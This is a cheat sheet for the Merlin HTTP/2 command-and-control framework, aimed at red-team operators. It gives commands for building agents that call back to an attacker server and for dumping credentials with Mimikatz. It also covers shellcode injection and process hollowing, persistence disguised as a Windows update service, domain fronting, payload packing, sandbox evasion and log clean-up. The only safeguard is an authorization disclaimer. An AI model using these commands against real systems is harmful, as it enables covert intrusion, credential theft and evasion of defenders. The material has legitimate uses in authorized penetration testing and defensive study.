Merlin C2 Framework Cheat Sheet

Overview

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang. It leverages HTTP/2 for communication, providing modern protocol evasion capabilities with built-in data jitter and encryption.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Pre-compiled Binaries

# Download latest release for Linux
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z

# Download latest release for Windows
# Download merlinServer-Windows-x64.7z from GitHub releases

# Download latest release for macOS
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z
7z x merlinServer-Darwin-x64.7z

Build from Source

# Install Go (version 1.19+)
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin
make build-server
make build-agent

Docker Installation

# Pull official Docker image
docker pull ne0nd0g/merlin

# Run Merlin server in Docker
docker run -it -p 443:443 ne0nd0g/merlin

Basic Usage

Starting Merlin Server

# Start server with default settings
./merlinServer-Linux-x64

# Start server with custom interface
./merlinServer-Linux-x64 -i 0.0.0.0

# Start server with custom port
./merlinServer-Linux-x64 -p 8443

# Start server with custom certificate
./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key

Agent Generation

# Generate Windows agent
make build-agent-windows

# Generate Linux agent
make build-agent-linux

# Generate macOS agent
make build-agent-darwin

Command Reference

Server Management

Command	Description
help	Display help menu
version	Show version information
listeners	List active listeners
agents	List connected agents
sessions	Show active sessions
exit	Exit Merlin server

Listener Management

Command	Description
listeners	List all listeners
use listener <type>	Select listener type
set <option> <value>	Set listener option
start	Start the listener
stop	Stop the listener
info	Show listener information

Agent Interaction

Command	Description
interact <agent-id>	Interact with agent
shell <command>	Execute shell command
upload <local> <remote>	Upload file to agent
download <remote> <local>	Download file from agent
kill	Kill the agent
back	Return to main menu

Listener Configuration

HTTP/2 Listener

# Use HTTP/2 listener
use listener http2

# Configure listener options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start

HTTP/3 Listener (QUIC)

# Use HTTP/3 listener
use listener http3

# Configure QUIC options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start

TCP Listener

# Use TCP listener
use listener tcp

# Configure TCP options
set Interface 0.0.0.0
set Port 4444

# Start listener
start

SMB Listener

# Use SMB listener (Windows)
use listener smb

# Configure SMB options
set Interface 0.0.0.0
set Port 445

# Start listener
start

Agent Configuration

HTTP/2 Agent

# Build HTTP/2 agent
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

# Build with custom options
GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go

Agent Options

# Set communication URL
-X main.url=https://server.com:443

# Set sleep interval
-X main.sleep=30s

# Set jitter percentage
-X main.jitter=0.2

# Set maximum retries
-X main.maxretry=7

# Set user agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Set proxy
-X main.proxy=http://proxy.com:8080

Post-Exploitation Commands

System Information

# Get system information
sysinfo

# Get current user
whoami

# Get environment variables
env

# Get network interfaces
ifconfig

# Get running processes
ps

File Operations

# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /path/to/new/directory

# Remove file
rm /path/to/file

# Copy file
cp /source/file /destination/file

# Move file
mv /source/file /destination/file

Network Operations

# Network connections
netstat

# ARP table
arp

# Routing table
route

# DNS lookup
nslookup domain.com

# Ping host
ping 192.168.1.1

Process Management

# List processes
ps

# Kill process
kill <pid>

# Start process
execute <command>

# Get process information
info <pid>

Advanced Features

Module System

# List available modules
modules

# Use module
use module <module-name>

# Set module options
set <option> <value>

# Run module
run

# Show module info
info

Built-in Modules

# Mimikatz module
use module mimikatz
set Command sekurlsa::logonpasswords
run

# PowerShell module
use module powershell
set Command Get-Process
run

# Assembly execution
use module executeassembly
set Assembly /path/to/assembly.exe
set Arguments "arg1 arg2"
run

Shellcode Execution

# Execute shellcode
use module shellcode
set Shellcode <base64-encoded-shellcode>
run

# Shellcode injection
use module shinject
set PID <target-pid>
set Shellcode <base64-encoded-shellcode>
run

Persistence

# Registry persistence
use module persistence
set Method registry
set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
set Value "Update"
set Data "C:\temp\agent.exe"
run

# Service persistence
use module service
set Name "UpdateService"
set DisplayName "Windows Update Service"
set BinaryPath "C:\temp\agent.exe"
run

Evasion Techniques

Traffic Obfuscation

# Custom User-Agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom headers
-X main.headers="X-Custom-Header:value"

# Domain fronting
-X main.url=https://cdn.example.com
-X main.host=legitimate-site.com

Payload Obfuscation

# Build with custom build tags
go build -tags="debug" -ldflags "-s -w" -o agent.exe

# Use UPX packing
upx --best agent.exe

# Custom encryption
-X main.psk=your-pre-shared-key

Anti-Analysis

# VM detection
use module vmdetect
run

# Sandbox evasion
use module sleep
set Duration 60
run

# Process hollowing
use module hollow
set Target notepad.exe
set Payload <base64-encoded-payload>
run

Certificate Management

Generate Self-Signed Certificate

# Generate certificate and key
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Generate with SAN
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -config <(
echo '[req]'
echo 'distinguished_name = req'
echo '[req]'
echo 'CN = server.com'
echo '[SAN]'
echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100'
)

Let's Encrypt Certificate

# Install certbot
sudo apt install certbot

# Generate certificate
certbot certonly --standalone -d yourdomain.com

# Use certificate with Merlin
./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem

Operational Procedures

Infrastructure Setup

# Use redirectors
# Set up nginx reverse proxy
server {
    listen 443 ssl http2;
    server_name legitimate-site.com;
    
    ssl_certificate /path/to/cert.crt;
    ssl_certificate_key /path/to/key.key;
    
    location / {
        proxy_pass https://merlin-server:443;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Team Operations

# Multi-operator setup
# Use shared database or file system
# Implement proper access controls
# Use separate operator certificates

Logging and Monitoring

# Enable detailed logging
./merlinServer-Linux-x64 -debug

# Monitor connections
tail -f merlin.log

# Network monitoring
tcpdump -i any -w merlin_traffic.pcap port 443

Troubleshooting

Connection Issues

# Check listener status
listeners

# Test connectivity
curl -k https://server.com:443

# Check certificate
openssl s_client -connect server.com:443 -servername server.com

Agent Issues

# Debug agent connection
# Build agent with debug flags
go build -ldflags "-X main.debug=true" -o agent-debug.exe

# Check agent logs
# Enable verbose output in agent

Performance Issues

# Adjust sleep and jitter
-X main.sleep=10s
-X main.jitter=0.1

# Optimize HTTP/2 settings
# Increase connection limits
# Use connection pooling

Certificate Problems

# Verify certificate
openssl x509 -in server.crt -text -noout

# Check certificate chain
openssl verify -CAfile ca.crt server.crt

# Test SSL configuration
sslscan server.com:443

Detection Evasion

Network Level

• Use legitimate certificates and domains
• Implement proper HTTP/2 configuration
• Vary communication patterns and timing
• Use domain fronting techniques
• Implement proper error handling

Host Level

• Use legitimate process names and paths
• Implement anti-VM and sandbox detection
• Use process hollowing and injection
• Encrypt payloads and communications
• Clean up artifacts and logs

Behavioral

• Limit resource usage and network activity
• Use legitimate user agents and headers
• Implement proper sleep and jitter
• Avoid suspicious API calls
• Use living-off-the-land techniques

Resources

• Merlin GitHub Repository
• Merlin Documentation
• Ne0nd0g Blog
• HTTP/2 C2 Communication

---

This cheat sheet provides a comprehensive reference for using Merlin C2 Framework. Always ensure you have proper authorization before using this tool in any environment.